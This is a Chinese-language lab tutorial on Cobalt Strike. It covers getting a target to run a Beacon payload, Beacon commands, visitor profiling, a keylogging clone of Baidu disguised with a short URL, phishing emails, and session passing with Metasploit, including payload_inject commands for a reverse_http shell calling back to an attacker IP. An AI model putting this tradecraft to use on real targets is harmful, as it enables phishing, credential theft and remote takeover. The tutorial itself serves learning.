1.上線機器的Beacon的常用命令
2.信息收集和網站克隆
3.釣魚郵件
4.CS傳遞會話到MSF
5.MSF會話傳遞到CS
1上線機器的Beacon的常用命令
介紹:CobaltStrike分為服務端和客戶端,一般我們將服務端放在kali,客戶端可以在物理機上面,或者虛擬機都可以
啟動服務端,首先創建一個監聽(注意,這里要關閉kali的Apache服務,要不然端口占用創建監聽不成功)
payload選擇Beacon HTTP ,HTTP Hosts選擇服務器的IP
點擊save
接著我們用CS生成一個payload(Windows exe),使得我靶機上線:
Lisrener選擇我們創建的監聽服務,點擊Launch
接著會生成一段payload,只要我們將這段payload在其他機器的win+R上粘貼運行,機器就會上線
利用:
打開CS上方的小云朵,會出現我們剛剛生成的web服務
選中服務,點擊下方的Copy URL
啟動我們的Windows10靶機,使用win+R,然后將我們復制的粘貼上去,點擊確定
靶機上線
接著右擊,打開命令窗口,輸入命令就可以查看目標機器信息
常用命令:
1.調節時間可以更快的看到執行命令:sleep 3 (務必執行要不然回顯太慢)
2.如果有的命令沒有找到提示Unknow command:命令前加shell,比如:shell whoami
3.查看局域網情況:net view
4.我們可以可以對機器進行瀏覽器代理、VNC桌面交互、文件瀏覽、網絡探測、端口掃描、進程列表和屏幕截圖等等,這里不再一一展示
2.信息收集和網站克隆
信息收集:
生成的一個網頁我們直接Launch即可
這時候會生成一個網址:
只要別人在內網中訪問這個網址,我們就可以得到機器信息
使用Windows10,訪問:
我們就可以在CS中的web log中獲取機器的信息:
網站克隆:
我們輸入我們需要克隆的網址,這里我選擇的是百度,然后選擇路徑,Attack是攻擊的站點,可以選也可以不選,這里我選的是信息收集的站點,開啟鍵盤記錄
生成成功:
如果我們要發給別人,讓其訪問,但是這樣別人一看就不是正常的網址,我們可以用短鏈接修飾一下,使他看起來更有迷惑性:
這里可以隨便選,我選的第一個,瀏覽器訪問:
之前開了鍵盤記錄,隨便輸一個:pengyuyan
查看CS的web log:
記錄成功
3.釣魚郵件?
第一個Targets:目標,我們新建一個文本文件,將想要發送郵件的目標地址寫上去
第二個Template:就是模版,我們可以登錄自己的郵箱,自己給自己發送一封郵件,然后點擊導出eml文件(注意這里的郵件內容自己編寫,可以把自己克隆的網站寫上去)
第三個Attachment就是附件:可以不填也可以填一個可執行程序
第四個Embed URL:嵌入URL地址,同樣可以寫我們監聽的地址
第五個郵件服務器:
第一個和第二個固定,第三個是自己郵箱,第四個是授權碼,需要我們自己生成:
SSL連接
注意:這里要開啟服務才行
第六個填寫自己的郵箱地址
最后點擊發送,這里是用我自己郵箱測試,查看自己的郵箱,果然發送成功:
4.CS傳遞會話到MS
打開MSF,建立監聽:
注意這里需要使用的HTTP服務,寫上本機IP,運行
打開CS,我們新建一個監聽器:
點擊save
然后選擇靶機右鍵:
選擇我們新建的監聽器:
等待MSF連接:
連接成功
5.MSF會話傳遞到CS
?我們打開Windows7,使用永恒之藍漏洞先讓MSF上線:
接著進行設置:
返回后臺bg
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.11.128 # CS服務端IP
set lport 4444?# CS服務端監聽的端口號
set DisablePayloadHandler True
set PrependMigrate True
set session 1 # 會話id
run
打開CS創建一個新的監聽器:
save,等待上線
成功上線